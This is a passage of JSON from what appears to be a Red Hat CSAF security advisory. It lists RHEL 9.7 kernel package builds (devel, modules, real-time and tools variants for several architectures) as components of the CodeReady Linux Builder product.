"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:5.14.0-611.35.1.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch"
},
"product_reference": "kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
